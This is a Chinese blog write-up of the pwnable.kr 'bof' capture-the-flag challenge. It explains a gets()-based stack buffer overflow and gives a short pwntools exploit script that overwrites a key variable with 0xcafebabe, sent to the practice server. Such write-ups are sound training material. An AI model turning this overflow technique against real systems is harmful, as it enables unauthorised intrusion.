【pwnable.kr】bof

最新推荐文章于 2020-06-04 22:59:18 发布
最新推荐文章于 2020-06-04 22:59:18 发布
阅读量186 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33892117/article/details/100086550
版权

题目描述

Nana told me that buffer overflow is one of the most common software vulnerability.
Is that true?

Download : http://pwnable.kr/bin/bof
Download : http://pwnable.kr/bin/bof.c

Running at : nc pwnable.kr 9000

我的思路

这个就是一道简单的栈溢出,ida可以看到s是一个char变量,但是gets函数可以输入一个字符串,从而导致溢出。被比较的变量存放在栈的高地址处,所以可以被覆盖,所以直接计算长度就可以了。注意数字是低位存在低地址,高位存在高地址,从低地址来取。
exp如下:

from pwn import *
import re
debug = 1
if debug:
    context.log_level = 'debug'
    p = process("./bof")
    gdb.attach(p)#,'set follow-fork-mode child')
#raw_input()
else:
    p = remote("pwnable.kr",9000)
    context.log_level = 'debug'
#p.recvuntil('overflow me :')
p.sendline("b"*0x2c+'c'*8+'\xbe\xba\xfe\xca')
p.interactive()
搓雪小怪兽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bof.rar_BOF
09-21
【标题】"BOF.rar" 是一个以 MFC(Microsoft Foundation Classes)库为基础的示例程序,主要展示了如何在Windows应用程序中使用按钮控件。"BOF" 可能是 "Buffer Overflow" 或 "Button Of Fun" 的缩写,但在这个上下...
BOF和EOF的区别
理想主义的花最终会盛开在浪漫主义的土壤里,我的热情永远不会熄灭在现实的平凡之中,我们终将上岸,阳光万里。
12-09 1160
在学生和机房中我们都一般涉及到数据库数据的调用和查询都用到了EOF和BOF,认识和了解EOF和BOF的具体含义和熟练掌握并且能够使用是很有必要的。 返回值 EOF Ture 当前位置在最后一条记录跟后面,无记录 False 当前位置在最后一条记录或在最后一条记录之前 返回值 BOF Ture 当前位置在第一条记录之前,无记录 False 当前位置在第...
pwnable.kr [bof]
shisuan1的博客
11-25 214
pwnable.kr [bof] Nana told me that buffer overflow is one of the most common software vulnerability. Is that true? Download : http://pwnable.kr/bin/bof Download : http://pwnable.kr/bin/bof.c Running ...
0x03-逆向-BoF基础的基础
0pr
06-04 1043
目录 今日目标 深入 BoF BoF 的前世今生 BoF 的种类 BoF 的应对策略 物理寻址的应用 找到 Boot Sector 在内存中的前两个字节的位置 寄存器 寄存器的种类 通用寄存器 段寄存器 指针寄存器 索引寄存器 控制寄存器 段和段寄存器小结 完成任务 程序拆解及必要汇编指令 org 指令 jmp 指令 times 指令 pusha popa 指令 条件控制指令 其他必要的汇编指令 总结 参考链接 今日目标 今天细看了一下 narnia2(不知道这是什
Pwnable.kr题目Writeup持续更新~
iqiqiya的博客
03-12 2244
题目地址:https://pwnable.kr/play.php 第一题[fd]: Mommy! what is a file descriptor in Linux? * try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link: https://youtu....
pwnable.krbof
river
05-01 4410
bof   两种方法来做吧(就是入门为了练习,多接触一些。。。) 方法1:用ida直接看 算一下 输入的字符串s是ebp-2c 参数1 a1是ebp+8 距离是52,所以要覆盖52个字符。 但是这么简单的程序,抓住机会,小白练习一下gdb 方法2:用GDB调试,算参数地址 gdb bof
BoF.tar.gz_BOF_bag of features
09-19
在提供的"BoF.tar.gz"压缩包中,"BoF"文件很可能包含了实现以上功能的Matlab脚本和函数。用户可以通过解压并运行这些脚本来理解和学习BoF模型的工作原理,同时也可以根据自己的需求进行修改和扩展,以适应不同的图像...
bof_recognition.rar_BOF_filter bank
07-14
Filter bank representation methods for speech recognition
matlab.zip_BOF_炼钢_炼钢 matlab_转炉_转炉炼钢
09-21
本压缩包文件"matlab.zip_BOF_炼钢_炼钢 matlab_转炉_转炉炼钢"提供了一套基于MATLAB编程的转炉炼钢优化方案,利用神经网络技术来改善和优化这个复杂的工业过程。 MATLAB,全称“矩阵实验室”,是一款强大的数学...
bof:betonfootball.eu
07-12
【标题】"bof:betonfootball.eu" 暗示了我们正在处理一个与“bof”(Buffer Overflow)漏洞相关的问题,可能是针对“betonfootball.eu”这个网站的安全研究。Buffer Overflow是编程中常见的一种安全漏洞,通常出现在...
bag of visual word
dawnminghuang的专栏
12-23 3605
是由文档分析推广到计算机视觉的,文档分析的词袋的用途,将一篇篇文档看成一个个词汇的集合,统计词汇在字典中出现的次数构成直方图。  example:  1:Bob likes to play basketball, Jim likes too.                   2:Bob also likes to play football games. 基于这两个文本文档,构造一个词典
Bag of Features (BOF)图像检索算法
彼岸花
04-13 6524
Bag of features(Bof)一种是用于图像和视频检索的算法。此算法对于不同角度,光照的图像,基本都能在图像库中正确检索。 检索就要进行比对。两幅不同的图像如何比对,比对什么,这就需要提炼出每幅图像中精练的东西出来进行比较。正如超市中的条形码,就能很好的反映出一件商品的所有特征。因此概括的来说,bof就是生成每幅图像的“条形码”来进行检索。实验中,我们有一个包含100幅图像的小型图
pwnable.kr】mistake
搓雪小怪兽的工作室
09-17 185
一些小tip strncmp的第三个参数是指最多比较的长度,如果两个字符串都比它短的话会提前结束。 题目描述 #include <stdio.h> #include <fcntl.h> #define PW_LEN 10 #define XORKEY 1 void xor(char* s, int len){ int i; for(i=0; i<len; i+...
pwnable.kr --- bof题解
Yannie's Blog
12-11 1068
题目如下: 我们将文件下载,打开 我们下载完题目中给的两个文件,然后打开bof.c文件,我们可以看到源码: #include &amp;amp;lt;stdio.h&amp;amp;gt; #include &amp;amp;lt;string.h&amp;amp;gt; #include &amp;amp;lt;stdlib.h&amp;amp;gt; void func(int key) { char overflowme[32]; printf(&
pwnable.kr第三题bof
07-25 156
Running at : nc pwnable.kr 9000 IDA查看 1 unsigned int __cdecl func(int a1) 2 { 3 char s; // [esp+1Ch] [ebp-2Ch] 4 unsigned int v3; // [esp+3Ch] [ebp-Ch] 5 6 v3 = __readgsdw...
pwnable.kr bof
潜心学习
07-04 1171
pwnable.kr bof 同样的,既然有源代码。我们就配合着源代码来做题,这样可能更利于搞懂高级语言被反汇编之后两者之间的联系。 bof.c #include&nbsp;&lt;stdio.h&gt; #include&nbsp;&lt;string.h&gt; #include&nbsp;&lt;stdlib.h&gt; void&nbsp;func(int&nbsp;key)...
基于BoF算法的图像分类
cassiePython的专栏
04-28 5463
基于BoF算法的图像分类图像分类一直是计算机视觉中的一个重要问题,BoF(Bag of features)算法在图像分类中具有着重要的作用。本文旨在介绍BoF算法的基本原理和过程并且给出Python代码的实现:用于解决在Caltech 101数据库上的多分类问题。算法起源起源1:纹理识别纹理(texture)是由一些重复的纹理单元(texton)组成的,如图1所示。
使用pandas BOF
最新发布
05-15
在 Pandas 中,BOF 指的是 Business Offset,是一种处理时间序列数据的方法。BOF 提供了一种方便的方法来进行时间聚合,可以帮助我们将时间序列数据按照业务需求进行划分和聚合。 使用 Pandas 的 BOF,需要用到 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值